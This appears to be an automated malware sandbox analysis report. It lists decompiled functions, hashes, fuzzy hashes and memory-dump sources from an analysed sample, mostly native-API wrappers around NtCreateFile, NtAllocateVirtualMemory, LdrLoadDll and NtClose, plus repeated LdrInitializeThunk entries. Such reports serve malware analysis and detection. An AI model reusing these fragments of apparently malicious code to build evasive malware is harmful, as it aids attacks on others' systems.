Opcode ID: d4a5a74702051ab3f1355cb9c04464ae45872bc81882c1ce62b08827cfd1deed
Instruction ID: 44195af4cfcd7844dc5464a96f27935e8bb9154da72c22cdf586d036b66e8624
Opcode Fuzzy Hash: d4a5a74702051ab3f1355cb9c04464ae45872bc81882c1ce62b08827cfd1deed
Instruction Fuzzy Hash: 8EF0A4B2200208ABCB14DF89DC81EEB77ADAF8C754F158649BA1D97241DA30E8518BA4

Uniqueness

Uniqueness Score: -1.00%

Function 004181BA, Relevance: 1.6, APIs: 1, Instructions: 71
filenativeCOMMON

Download Yara Rule

C-Code - Quality: 49%

			E004181BA(void* __ebx, void* __edi, void* _a1, intOrPtr _a4, HANDLE* _a8, long _a12, struct _EXCEPTION_RECORD _a16, struct _ERESOURCE_LITE _a20, struct _GUID _a24, long _a28, long _a32, long _a36, long _a40, void* _a44, long _a48) {
				void* _t28;
				long _t40;
				signed char _t42;
				void* _t62;
				intOrPtr* _t63;

				_t61 = __edi - 1;
				if(__edi - 1 > 0) {
					 *(__ebx + 0x6a561048) =  *(__ebx + 0x6a561048) | _t42;
					_t63 = _t28 + 0xc44;
					L00418DC0(_t61, _t28, _t63,  *((intOrPtr*)(_t28 + 0x10)), 0, 0x29);
					return  *((intOrPtr*)( *_t63))(_a12, _a16, _a20, _a24, _a28, _a32, _a36, _a40, _a44, _t62);
				} else {
					asm("rcl byte [eax+eax*2-0x741374ab], 1");
					_t34 = _a4;
					_push(_t62);
					_t3 = _t34 + 0xc40; // 0xc40
					L00418DC0(_t61, _a4, _t3,  *((intOrPtr*)(_a4 + 0x10)), 0, 0x28);
					_t40 = NtCreateFile(_a8, _a12, _a16, _a20, _a24, _a28, _a32, _a36, _a40, _a44, _a48); // executed
					return _t40;
				}
			}

0x004181ba
0x004181bb
0x00418225
0x0041822f
0x00418237
0x00418269
0x004181bd
0x004181bd
0x004181c3
0x004181c9
0x004181cf
0x004181d7
0x0041820d
0x00418211
0x00418211

APIs

NtCreateFile.NTDLL(00000060,00408AF3,?,00413B97,00408AF3,FFFFFFFF,?,?,FFFFFFFF,00408AF3,00413B97,?,00408AF3,00000060,00000000,00000000), ref: 0041820D

Memory Dump Source

Source File: 0000000B.00000001.2105788438.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID: CreateFile
String ID:
API String ID: 823142352-0
Opcode ID: d06c22877cccc1304cd0d5e8a167a1d7dd7636f2f2587f7672da8cbc3b7c47e6
Instruction ID: 82f27e5dbeb61c95509b8350a27b22fb312ef2eed5b6af0adeeb7139150ea748
Opcode Fuzzy Hash: d06c22877cccc1304cd0d5e8a167a1d7dd7636f2f2587f7672da8cbc3b7c47e6
Instruction Fuzzy Hash: 5B2108B2210149AFCB08DF99D884CEB77A9FF8C354B15868DF91D97202C634E851CBA4

Uniqueness

Uniqueness Score: -1.00%

Function 00409B20, Relevance: 1.5, APIs: 1, Instructions: 48
libraryloaderCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E00409B20(void* __eflags, void* _a4, intOrPtr _a8) {
				char* _v8;
				struct _EXCEPTION_RECORD _v12;
				struct _OBJDIR_INFORMATION _v16;
				char _v536;
				void* _t15;
				struct _OBJDIR_INFORMATION _t17;
				struct _OBJDIR_INFORMATION _t18;
				void* _t30;
				void* _t31;
				void* _t32;

				_t24 = _a8;
				_v8 =  &_v536;
				_t15 = E0041AB50( &_v12, 0x104, _a8);
				_t31 = _t30 + 0xc;
				if(_t15 != 0) {
					_t17 = E0041AF70(_v8, _t24, __eflags, _v8);
					_t32 = _t31 + 4;
					__eflags = _t17;
					if(_t17 != 0) {
						E0041B1F0( &_v12, 0);
						_t32 = _t32 + 8;
					}
					_t18 = E00419300(_v8);
					_v16 = _t18;
					__eflags = _t18;
					if(_t18 == 0) {
						LdrLoadDll(0, 0,  &_v12,  &_v16); // executed
						return _v16;
					}
					return _t18;
				} else {
					return _t15;
				}
			}

0x00409b29
0x00409b3c
0x00409b3f
0x00409b44
0x00409b49
0x00409b53
0x00409b58
0x00409b5b
0x00409b5d
0x00409b65
0x00409b6a
0x00409b6a
0x00409b71
0x00409b79
0x00409b7c
0x00409b7e
0x00409b92
0x00000000
0x00409b94
0x00409b9a
0x00409b4e
0x00409b4e
0x00409b4e

APIs

LdrLoadDll.NTDLL(00000000,00000000,00000003,?), ref: 00409B92

Memory Dump Source

Source File: 0000000B.00000002.2145801175.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID: Load
String ID:
API String ID: 2234796835-0
Opcode ID: 54eed7fb54c4bb33c5ecf3c62be074d2fec7e96364ab3bba8fcd8ce07f2b6dc1
Instruction ID: f6872c6640a97d379917802917a35d8835196bd2b620e753e6f67e56f73dccdd
Opcode Fuzzy Hash: 54eed7fb54c4bb33c5ecf3c62be074d2fec7e96364ab3bba8fcd8ce07f2b6dc1
Instruction Fuzzy Hash: EC0100B5D0010DBBDB10DAA5EC42FDEB778AB54318F0041A9A908A7281F635EA54C795

Uniqueness

Uniqueness Score: -1.00%

Function 004181C0, Relevance: 1.5, APIs: 1, Instructions: 40
filenativeCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E004181C0(intOrPtr _a4, HANDLE* _a8, long _a12, struct _EXCEPTION_RECORD _a16, struct _ERESOURCE_LITE _a20, struct _GUID _a24, long _a28, long _a32, long _a36, long _a40, void* _a44, long _a48) {
				long _t21;
				void* _t31;

				_t3 = _a4 + 0xc40; // 0xc40
				L00418DC0(_t31, _a4, _t3,  *((intOrPtr*)(_a4 + 0x10)), 0, 0x28);
				_t21 = NtCreateFile(_a8, _a12, _a16, _a20, _a24, _a28, _a32, _a36, _a40, _a44, _a48); // executed
				return _t21;
			}

0x004181cf
0x004181d7
0x0041820d
0x00418211

APIs

NtCreateFile.NTDLL(00000060,00408AF3,?,00413B97,00408AF3,FFFFFFFF,?,?,FFFFFFFF,00408AF3,00413B97,?,00408AF3,00000060,00000000,00000000), ref: 0041820D

Memory Dump Source

Source File: 0000000B.00000001.2105788438.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID: CreateFile
String ID:
API String ID: 823142352-0
Opcode ID: 255eac8f353b7b8934ff6a71ff904c2473dc3201d920852afcf054611f931be4
Instruction ID: 76db84dd9462a71377061bd321799a59568980bd09e0245c51acac76316ecf65
Opcode Fuzzy Hash: 255eac8f353b7b8934ff6a71ff904c2473dc3201d920852afcf054611f931be4
Instruction Fuzzy Hash: 52F0B6B2200208ABCB08CF89DC85DEB77ADAF8C754F158248FA0D97241C630E8518BA4

Uniqueness

Uniqueness Score: -1.00%

Function 004182EB, Relevance: 1.5, APIs: 1, Instructions: 36nativeCOMMON

Download Yara Rule

APIs

NtClose.NTDLL(00413D30,?,?,00413D30,00408AF3,FFFFFFFF), ref: 00418315

Memory Dump Source

Source File: 0000000B.00000001.2105788438.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID: Close
String ID:
API String ID: 3535843008-0
Opcode ID: e715edb3c493f1f287f3c4b7b7f6bc6b94959a6bba4e710101c5dc1b181e948d
Instruction ID: 65a9a333b6333b62fd8a2b61e5747526a40d7b39af690597ae0511c14cabd584
Opcode Fuzzy Hash: e715edb3c493f1f287f3c4b7b7f6bc6b94959a6bba4e710101c5dc1b181e948d
Instruction Fuzzy Hash: C4F08276200214ABDB14EFD8DC80EEB736DEF88720F14855DFA1C9B241CA31E9558BA1

Uniqueness

Uniqueness Score: -1.00%

Function 004183A0, Relevance: 1.5, APIs: 1, Instructions: 30
memorynativeCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E004183A0(intOrPtr _a4, void* _a8, PVOID* _a12, long _a16, long* _a20, long _a24, long _a28) {
				long _t14;
				void* _t21;

				_t3 = _a4 + 0xc60; // 0xca0
				L00418DC0(_t21, _a4, _t3,  *((intOrPtr*)(_a4 + 0x10)), 0, 0x30);
				_t14 = NtAllocateVirtualMemory(_a8, _a12, _a16, _a20, _a24, _a28); // executed
				return _t14;
			}

0x004183af
0x004183b7
0x004183d9
0x004183dd

APIs

NtAllocateVirtualMemory.NTDLL(00003000,?,00000000,?,00418F94,?,00000000,?,00003000,00000040,00000000,00000000,00408AF3), ref: 004183D9

Memory Dump Source

Source File: 0000000B.00000001.2105788438.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID: AllocateMemoryVirtual
String ID:
API String ID: 2167126740-0
Opcode ID: b2c7a9f16f7248b886659db27fd6bc2ac43cd74a54ece53f3674161978f52f4b
Instruction ID: ed05b43336be2385218ce2c210938f1a749d46cd8ec257da0df7421e0e4bafff
Opcode Fuzzy Hash: b2c7a9f16f7248b886659db27fd6bc2ac43cd74a54ece53f3674161978f52f4b
Instruction Fuzzy Hash: BCF015B2200208ABCB14DF89DC81EEB77ADAF88754F118549FE0897241CA30F810CBA4

Uniqueness

Uniqueness Score: -1.00%

Function 004182F0, Relevance: 1.5, APIs: 1, Instructions: 20nativeCOMMON

Download Yara Rule

APIs

NtClose.NTDLL(00413D30,?,?,00413D30,00408AF3,FFFFFFFF), ref: 00418315

Memory Dump Source

Source File: 0000000B.00000001.2105788438.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID: Close
String ID:
API String ID: 3535843008-0
Opcode ID: 462dc2fd90f57a4a7913ee6487bbcc8fe2490777b3746e68c632e34f0b64e1a4
Instruction ID: fa02b1b0b4c248d7afc65a810b6911db7169f724aa7cfa6c67706bd771296af7
Opcode Fuzzy Hash: 462dc2fd90f57a4a7913ee6487bbcc8fe2490777b3746e68c632e34f0b64e1a4
Instruction Fuzzy Hash: F5D01776200314ABD710EF99DC85EE77BACEF48760F154499BA189B282CA30FA0086E0

Uniqueness

Uniqueness Score: -1.00%

Function 00730078, Relevance: 1.5, APIs: 1, Instructions: 6libraryCOMMON

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 00730086

Memory Dump Source

Source File: 0000000B.00000002.2147089917.0000000000720000.00000040.00000001.sdmp, Offset: 00710000, based on PE: true

Associated: 0000000B.00000002.2147040566.0000000000710000.00000040.00000001.sdmp Download File
Associated: 0000000B.00000002.2147830919.0000000000800000.00000040.00000001.sdmp Download File
Associated: 0000000B.00000002.2148032311.0000000000810000.00000040.00000001.sdmp Download File
Associated: 0000000B.00000002.2177331659.0000000000814000.00000040.00000001.sdmp Download File
Associated: 0000000B.00000002.2178234423.0000000000817000.00000040.00000001.sdmp Download File
Associated: 0000000B.00000002.2179037101.0000000000820000.00000040.00000001.sdmp Download File
Associated: 0000000B.00000002.2196223654.0000000000880000.00000040.00000001.sdmp Download File

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: e361fdd744b37e572f0fb281d5ba342fdf237642d1eded7d2c73f776bcbc3673
Instruction ID: 3a645d05db048e5a2937cf36c3d58d647fc753ae06e93f94360992995f7f05c0
Opcode Fuzzy Hash: e361fdd744b37e572f0fb281d5ba342fdf237642d1eded7d2c73f776bcbc3673
Instruction Fuzzy Hash: 2AB012B1504640C7F304F704D905B16B212FBD0F00F408938A14F86591D73DAD2CC78B

Uniqueness

Uniqueness Score: -1.00%

Function 00730048, Relevance: 1.5, APIs: 1, Instructions: 6libraryCOMMON

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 00730053

Memory Dump Source

Source File: 0000000B.00000002.2147089917.0000000000720000.00000040.00000001.sdmp, Offset: 00710000, based on PE: true

Associated: 0000000B.00000002.2147040566.0000000000710000.00000040.00000001.sdmp Download File
Associated: 0000000B.00000002.2147830919.0000000000800000.00000040.00000001.sdmp Download File
Associated: 0000000B.00000002.2148032311.0000000000810000.00000040.00000001.sdmp Download File
Associated: 0000000B.00000002.2177331659.0000000000814000.00000040.00000001.sdmp Download File
Associated: 0000000B.00000002.2178234423.0000000000817000.00000040.00000001.sdmp Download File
Associated: 0000000B.00000002.2179037101.0000000000820000.00000040.00000001.sdmp Download File
Associated: 0000000B.00000002.2196223654.0000000000880000.00000040.00000001.sdmp Download File

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: 2990f9787256fe8461cfe6d04bba8dff018c5c70436f30267b6dae5db6cec36e
Instruction ID: 41e4343c146f66e2bb318e135f4e172b2897deff735033a37a94e91f6413aa4b
Opcode Fuzzy Hash: 2990f9787256fe8461cfe6d04bba8dff018c5c70436f30267b6dae5db6cec36e
Instruction Fuzzy Hash: DBB012B2100540C7E3099714D946B4B7210FB90F00F40C93BA11B81861DB3C993CD46A

Uniqueness

Uniqueness Score: -1.00%

Function 007300C4, Relevance: 1.5, APIs: 1, Instructions: 6libraryCOMMON

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 007300CF

Memory Dump Source

Source File: 0000000B.00000002.2147089917.0000000000720000.00000040.00000001.sdmp, Offset: 00710000, based on PE: true

Associated: 0000000B.00000002.2147040566.0000000000710000.00000040.00000001.sdmp Download File
Associated: 0000000B.00000002.2147830919.0000000000800000.00000040.00000001.sdmp Download File
Associated: 0000000B.00000002.2148032311.0000000000810000.00000040.00000001.sdmp Download File
Associated: 0000000B.00000002.2177331659.0000000000814000.00000040.00000001.sdmp Download File
Associated: 0000000B.00000002.2178234423.0000000000817000.00000040.00000001.sdmp Download File
Associated: 0000000B.00000002.2179037101.0000000000820000.00000040.00000001.sdmp Download File
Associated: 0000000B.00000002.2196223654.0000000000880000.00000040.00000001.sdmp Download File

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: 4bff211391be707d7e89478abb6bff82e3a2567f710e9bf85143fd517881f32a
Instruction ID: e6c77262f5ba2182d122b5874ee39bb292c5f7eee28c199429390ea98cabeb31
Opcode Fuzzy Hash: 4bff211391be707d7e89478abb6bff82e3a2567f710e9bf85143fd517881f32a
Instruction Fuzzy Hash: 79B01272100940C7E309D724DD06F4B7210FFC0F01F008A3EA00B81851DA38A93CC846

Uniqueness

Uniqueness Score: -1.00%

Function 007307AC, Relevance: 1.5, APIs: 1, Instructions: 6libraryCOMMON

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 007307B7

Memory Dump Source

Source File: 0000000B.00000002.2147089917.0000000000720000.00000040.00000001.sdmp, Offset: 00710000, based on PE: true

Associated: 0000000B.00000002.2147040566.0000000000710000.00000040.00000001.sdmp Download File
Associated: 0000000B.00000002.2147830919.0000000000800000.00000040.00000001.sdmp Download File
Associated: 0000000B.00000002.2148032311.0000000000810000.00000040.00000001.sdmp Download File
Associated: 0000000B.00000002.2177331659.0000000000814000.00000040.00000001.sdmp Download File
Associated: 0000000B.00000002.2178234423.0000000000817000.00000040.00000001.sdmp Download File
Associated: 0000000B.00000002.2179037101.0000000000820000.00000040.00000001.sdmp Download File
Associated: 0000000B.00000002.2196223654.0000000000880000.00000040.00000001.sdmp Download File

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: 154562b1c1044579d2961e918a12e94c940bf0a0b9e8e44222bba29e99ad0489
Instruction ID: cdb92b4df541c6703467cf01e2fb590a315ac15b2f911c24ec3250dccee83ae6
Opcode Fuzzy Hash: 154562b1c1044579d2961e918a12e94c940bf0a0b9e8e44222bba29e99ad0489
Instruction Fuzzy Hash: 64B01272200540C7E3099724D906B4B7310FB80F00F008D3AE04781892DB78992CD487

Uniqueness

Uniqueness Score: -1.00%

Function 0072F900, Relevance: 1.5, APIs: 1, Instructions: 6libraryCOMMON

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 0072F90E

Memory Dump Source

Source File: 0000000B.00000002.2147089917.0000000000720000.00000040.00000001.sdmp, Offset: 00710000, based on PE: true

Associated: 0000000B.00000002.2147040566.0000000000710000.00000040.00000001.sdmp Download File
Associated: 0000000B.00000002.2147830919.0000000000800000.00000040.00000001.sdmp Download File
Associated: 0000000B.00000002.2148032311.0000000000810000.00000040.00000001.sdmp Download File
Associated: 0000000B.00000002.2177331659.0000000000814000.00000040.00000001.sdmp Download File
Associated: 0000000B.00000002.2178234423.0000000000817000.00000040.00000001.sdmp Download File
Associated: 0000000B.00000002.2179037101.0000000000820000.00000040.00000001.sdmp Download File
Associated: 0000000B.00000002.2196223654.0000000000880000.00000040.00000001.sdmp Download File

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: 8dbcbf5a4d7b7f1c08d6b628364f414bd548082eea0b37b51084cc01ff771fa2
Instruction ID: 05ac91611fc184a3f88202f4b9a2f722369f22817df951cee1fa85cf63676e78
Opcode Fuzzy Hash: 8dbcbf5a4d7b7f1c08d6b628364f414bd548082eea0b37b51084cc01ff771fa2
Instruction Fuzzy Hash: A2B01272605540C7F30ADB04D915B467251FBC0F00F408934E50746590D77D9E38D587

Uniqueness

Uniqueness Score: -1.00%

Function 0072F9F0, Relevance: 1.5, APIs: 1, Instructions: 6libraryCOMMON

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 0072F9FB

Memory Dump Source

Source File: 0000000B.00000002.2147089917.0000000000720000.00000040.00000001.sdmp, Offset: 00710000, based on PE: true

Associated: 0000000B.00000002.2147040566.0000000000710000.00000040.00000001.sdmp Download File
Associated: 0000000B.00000002.2147830919.0000000000800000.00000040.00000001.sdmp Download File
Associated: 0000000B.00000002.2148032311.0000000000810000.00000040.00000001.sdmp Download File
Associated: 0000000B.00000002.2177331659.0000000000814000.00000040.00000001.sdmp Download File
Associated: 0000000B.00000002.2178234423.0000000000817000.00000040.00000001.sdmp Download File
Associated: 0000000B.00000002.2179037101.0000000000820000.00000040.00000001.sdmp Download File
Associated: 0000000B.00000002.2196223654.0000000000880000.00000040.00000001.sdmp Download File

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: 14ba51ac3c4685a444062647e83330cf6da9a5db4e41c8a362ae144bb3555ef6
Instruction ID: 864711eabb7dc0f9c0a00528bc7204798e3bbfe8ecaf20bba7921b9fd7ea0c89
Opcode Fuzzy Hash: 14ba51ac3c4685a444062647e83330cf6da9a5db4e41c8a362ae144bb3555ef6
Instruction Fuzzy Hash: B8B012B2200640C7F3199714D90AF4BB310FBD0F00F00CA3AA00781890DA3C992CC44A

Uniqueness

Uniqueness Score: -1.00%

Function 0072FAE8, Relevance: 1.5, APIs: 1, Instructions: 6libraryCOMMON

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 0072FAF3

Memory Dump Source

Source File: 0000000B.00000002.2147089917.0000000000720000.00000040.00000001.sdmp, Offset: 00710000, based on PE: true

Associated: 0000000B.00000002.2147040566.0000000000710000.00000040.00000001.sdmp Download File
Associated: 0000000B.00000002.2147830919.0000000000800000.00000040.00000001.sdmp Download File
Associated: 0000000B.00000002.2148032311.0000000000810000.00000040.00000001.sdmp Download File
Associated: 0000000B.00000002.2177331659.0000000000814000.00000040.00000001.sdmp Download File
Associated: 0000000B.00000002.2178234423.0000000000817000.00000040.00000001.sdmp Download File
Associated: 0000000B.00000002.2179037101.0000000000820000.00000040.00000001.sdmp Download File
Associated: 0000000B.00000002.2196223654.0000000000880000.00000040.00000001.sdmp Download File

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: 34a2345e9ef716244e2d46a9efe759ea4b84b9c33e8f95bda4e579fccc15316f
Instruction ID: bb22edd625d441e86b4201bf2007cb1784deb073e32f09f3a807e6c8f80ed535
Opcode Fuzzy Hash: 34a2345e9ef716244e2d46a9efe759ea4b84b9c33e8f95bda4e579fccc15316f
Instruction Fuzzy Hash: ACB01272104544C7F3099714ED06B8B7210FB80F00F00893AA007828A1DB39992CE456

Uniqueness

Uniqueness Score: -1.00%

Function 0072FAD0, Relevance: 1.5, APIs: 1, Instructions: 6libraryCOMMON

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 0072FADB

Memory Dump Source

Source File: 0000000B.00000002.2147089917.0000000000720000.00000040.00000001.sdmp, Offset: 00710000, based on PE: true

Associated: 0000000B.00000002.2147040566.0000000000710000.00000040.00000001.sdmp Download File
Associated: 0000000B.00000002.2147830919.0000000000800000.00000040.00000001.sdmp Download File
Associated: 0000000B.00000002.2148032311.0000000000810000.00000040.00000001.sdmp Download File
Associated: 0000000B.00000002.2177331659.0000000000814000.00000040.00000001.sdmp Download File
Associated: 0000000B.00000002.2178234423.0000000000817000.00000040.00000001.sdmp Download File
Associated: 0000000B.00000002.2179037101.0000000000820000.00000040.00000001.sdmp Download File
Associated: 0000000B.00000002.2196223654.0000000000880000.00000040.00000001.sdmp Download File

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: a3c9a84db5a1b27ba292bbe6ac7156695ca75f7b31983341e9d88d14b699633e
Instruction ID: b885d126f35a04098635745a666b93c7a8e67e4acbf17db3f6051f78ecae7b76
Opcode Fuzzy Hash: a3c9a84db5a1b27ba292bbe6ac7156695ca75f7b31983341e9d88d14b699633e
Instruction Fuzzy Hash: 9AB01273104944C7E349A714DD06B8B7210FBC0F01F00893AA00786851DB389A2CE986

Uniqueness

Uniqueness Score: -1.00%

Function 0072FB68, Relevance: 1.5, APIs: 1, Instructions: 6libraryCOMMON

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 0072FB73

Memory Dump Source

Source File: 0000000B.00000002.2147089917.0000000000720000.00000040.00000001.sdmp, Offset: 00710000, based on PE: true

Associated: 0000000B.00000002.2147040566.0000000000710000.00000040.00000001.sdmp Download File
Associated: 0000000B.00000002.2147830919.0000000000800000.00000040.00000001.sdmp Download File
Associated: 0000000B.00000002.2148032311.0000000000810000.00000040.00000001.sdmp Download File
Associated: 0000000B.00000002.2177331659.0000000000814000.00000040.00000001.sdmp Download File
Associated: 0000000B.00000002.2178234423.0000000000817000.00000040.00000001.sdmp Download File
Associated: 0000000B.00000002.2179037101.0000000000820000.00000040.00000001.sdmp Download File
Associated: 0000000B.00000002.2196223654.0000000000880000.00000040.00000001.sdmp Download File

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: 9be46aa23fef74e92aa7046bff19981ac9c85faae99787f44d25aa72a03369f2
Instruction ID: fe3894545e6d7ff35e2d014bd1b41c27fc981d7cba2425ddd0908e3dd582fca9
Opcode Fuzzy Hash: 9be46aa23fef74e92aa7046bff19981ac9c85faae99787f44d25aa72a03369f2
Instruction Fuzzy Hash: 17B01272100544C7E3099714D906B8B7210FB80F00F008E3AA04782991DB78992DE446

Uniqueness

Uniqueness Score: -1.00%

Function 0072FBB8, Relevance: 1.5, APIs: 1, Instructions: 6libraryCOMMON

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 0072FBC3

Memory Dump Source

Source File: 0000000B.00000002.2147089917.0000000000720000.00000040.00000001.sdmp, Offset: 00710000, based on PE: true

Associated: 0000000B.00000002.2147040566.0000000000710000.00000040.00000001.sdmp Download File
Associated: 0000000B.00000002.2147830919.0000000000800000.00000040.00000001.sdmp Download File
Associated: 0000000B.00000002.2148032311.0000000000810000.00000040.00000001.sdmp Download File
Associated: 0000000B.00000002.2177331659.0000000000814000.00000040.00000001.sdmp Download File
Associated: 0000000B.00000002.2178234423.0000000000817000.00000040.00000001.sdmp Download File
Associated: 0000000B.00000002.2179037101.0000000000820000.00000040.00000001.sdmp Download File
Associated: 0000000B.00000002.2196223654.0000000000880000.00000040.00000001.sdmp Download File

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: 7ba0f55f1fd72216c7a5d20d06c619025faf51988f765d7a98e58a350c3ee9ce
Instruction ID: 98b7ab4c3374ce945d87304c272764997da5ea40185bb6170513ade09291bf69
Opcode Fuzzy Hash: 7ba0f55f1fd72216c7a5d20d06c619025faf51988f765d7a98e58a350c3ee9ce
Instruction Fuzzy Hash: 97B012721005C4C7E30D9714D906B8F7210FB80F00F00893AA40782861DB789A2CE45A

Uniqueness

Uniqueness Score: -1.00%

Function 0072FC60, Relevance: 1.5, APIs: 1, Instructions: 6libraryCOMMON

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 0072FC6B

Memory Dump Source

Source File: 0000000B.00000002.2147089917.0000000000720000.00000040.00000001.sdmp, Offset: 00710000, based on PE: true

Associated: 0000000B.00000002.2147040566.0000000000710000.00000040.00000001.sdmp Download File
Associated: 0000000B.00000002.2147830919.0000000000800000.00000040.00000001.sdmp Download File
Associated: 0000000B.00000002.2148032311.0000000000810000.00000040.00000001.sdmp Download File
Associated: 0000000B.00000002.2177331659.0000000000814000.00000040.00000001.sdmp Download File
Associated: 0000000B.00000002.2178234423.0000000000817000.00000040.00000001.sdmp Download File
Associated: 0000000B.00000002.2179037101.0000000000820000.00000040.00000001.sdmp Download File
Associated: 0000000B.00000002.2196223654.0000000000880000.00000040.00000001.sdmp Download File

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: b6c387d48eb785842166a0bd4fb6c7cae32a88c5d36fa47243e2a3f83643301c
Instruction ID: 69502d12976c3e383ebc8ea250e6427301c1fd9f045747c541fd94b810363c34
Opcode Fuzzy Hash: b6c387d48eb785842166a0bd4fb6c7cae32a88c5d36fa47243e2a3f83643301c
Instruction Fuzzy Hash: 3AB01277105940C7E349A714DD0AB5B7220FBC0F01F00893AE00781890DA38993CC54A

Uniqueness

Uniqueness Score: -1.00%

Function 0072FC90, Relevance: 1.5, APIs: 1, Instructions: 6libraryCOMMON

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 0072FC9B

Memory Dump Source

Source File: 0000000B.00000002.2147089917.0000000000720000.00000040.00000001.sdmp, Offset: 00710000, based on PE: true

Associated: 0000000B.00000002.2147040566.0000000000710000.00000040.00000001.sdmp Download File
Associated: 0000000B.00000002.2147830919.0000000000800000.00000040.00000001.sdmp Download File
Associated: 0000000B.00000002.2148032311.0000000000810000.00000040.00000001.sdmp Download File
Associated: 0000000B.00000002.2177331659.0000000000814000.00000040.00000001.sdmp Download File
Associated: 0000000B.00000002.2178234423.0000000000817000.00000040.00000001.sdmp Download File
Associated: 0000000B.00000002.2179037101.0000000000820000.00000040.00000001.sdmp Download File
Associated: 0000000B.00000002.2196223654.0000000000880000.00000040.00000001.sdmp Download File

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: c03c3f025ade335fb37a3227fdd9bdec0ce29723ea859b950f344d641557639d
Instruction ID: 41c45e5f09b42d6e0ddb2dc3248e04f5cc5ab51982cd1fe1d329002f24c15819
Opcode Fuzzy Hash: c03c3f025ade335fb37a3227fdd9bdec0ce29723ea859b950f344d641557639d
Instruction Fuzzy Hash: 14B01272104580C7E349AB14D90AB5BB210FB90F00F40893AE04B81850DA3C992CC546

Uniqueness

Uniqueness Score: -1.00%

Function 0072FDC0, Relevance: 1.5, APIs: 1, Instructions: 6libraryCOMMON

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 0072FDCB

Memory Dump Source

Source File: 0000000B.00000002.2147089917.0000000000720000.00000040.00000001.sdmp, Offset: 00710000, based on PE: true

Associated: 0000000B.00000002.2147040566.0000000000710000.00000040.00000001.sdmp Download File
Associated: 0000000B.00000002.2147830919.0000000000800000.00000040.00000001.sdmp Download File
Associated: 0000000B.00000002.2148032311.0000000000810000.00000040.00000001.sdmp Download File
Associated: 0000000B.00000002.2177331659.0000000000814000.00000040.00000001.sdmp Download File
Associated: 0000000B.00000002.2178234423.0000000000817000.00000040.00000001.sdmp Download File
Associated: 0000000B.00000002.2179037101.0000000000820000.00000040.00000001.sdmp Download File
Associated: 0000000B.00000002.2196223654.0000000000880000.00000040.00000001.sdmp Download File

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: 3c5c70486422d4cf76ce1f9e49ddc8b8cfc879bf3efb7896afe645da2070dab7
Instruction ID: d88988b585cc81dca5f800d6bb39f1198a76ae257c125849f4a62a02810904f6
Opcode Fuzzy Hash: 3c5c70486422d4cf76ce1f9e49ddc8b8cfc879bf3efb7896afe645da2070dab7
Instruction Fuzzy Hash: 20B01272140540C7E30A9714DA56B4B7220FB80F40F008D3AA04781891DBB89B2CD486

Uniqueness

Uniqueness Score: -1.00%

Function 0072FD8C, Relevance: 1.5, APIs: 1, Instructions: 6libraryCOMMON

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 0072FD9A

Memory Dump Source

Source File: 0000000B.00000002.2147089917.0000000000720000.00000040.00000001.sdmp, Offset: 00710000, based on PE: true

Associated: 0000000B.00000002.2147040566.0000000000710000.00000040.00000001.sdmp Download File
Associated: 0000000B.00000002.2147830919.0000000000800000.00000040.00000001.sdmp Download File
Associated: 0000000B.00000002.2148032311.0000000000810000.00000040.00000001.sdmp Download File
Associated: 0000000B.00000002.2177331659.0000000000814000.00000040.00000001.sdmp Download File
Associated: 0000000B.00000002.2178234423.0000000000817000.00000040.00000001.sdmp Download File
Associated: 0000000B.00000002.2179037101.0000000000820000.00000040.00000001.sdmp Download File
Associated: 0000000B.00000002.2196223654.0000000000880000.00000040.00000001.sdmp Download File

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: bc46901120b7194c8a84a042a6f6d6e6859f3849350b0ab548ee1941b68cff92
Instruction ID: c46011bb0c46dfed5c8ab186c0f719e5b9e72ad0d6ef7da6a0d9d2ed8661a3c9
Opcode Fuzzy Hash: bc46901120b7194c8a84a042a6f6d6e6859f3849350b0ab548ee1941b68cff92
Instruction Fuzzy Hash: 8FB0927110054087E205A704D905B4AB212FB90B00F808A35A4468A591D66A9A28C686

Uniqueness

Uniqueness Score: -1.00%

